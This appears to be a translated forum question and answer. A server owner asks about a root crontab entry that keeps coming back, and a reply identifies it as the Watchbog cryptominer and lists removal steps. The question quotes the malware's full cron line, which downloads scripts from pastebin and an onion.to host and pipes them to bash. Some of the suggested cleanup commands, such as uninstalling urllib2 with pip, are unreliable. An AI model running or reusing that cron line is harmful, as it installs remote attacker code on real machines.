大家好,
我在我们的 Ubuntu Server 16.04 VM 的根用户中有一个 crontab 条目。
*/11 * * * * (curl -fsSL https://pastebin.com/raw/9QVpd02i||wget -q -O- https://pastebin.com/raw/9QVpd02i||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/t3B4cpC8").read()'||curl -fsSL https://pastebin.com/raw/TwuQybiQ||wget -q -O - https://pastebin.com/raw/TwuQybiQ||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt -m 90||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
每次我删除这个条目,过一会儿它就会回来。有人知道我进入了什么状态吗?这个服务器是不是以某种方式被抵押了?
我采取的解决方法是,由于我无法永久删除该条目,因此我在我们的网关/路由器中创建了两个 DNS 条目,其中 pastebin.com 和 onion.to 将指向 127.0.0.1。
我认为这不是评论中发布的加密问题的重复,但类似。因此,这个问题将保持独立,因为在审核后,这将需要不同的解决方案。谢谢。
问候,艾伦
答案1
正如评论中所述,您已通过加密矿工安装了病毒。这将告诉您如何删除它:Watchbog 漏洞
总结一下步骤:
crontab –r
ls /var/spool/cron/crontabs
pip uninstall urllib2
apt-get remove --auto-remove curl
apt-get remove --auto-remove wget
crontab -r
while true ; do killall watchbog ; done
sudo passwd root
阅读整个链接以获得逐步的详细信息并首先验证您是否感染了此病毒。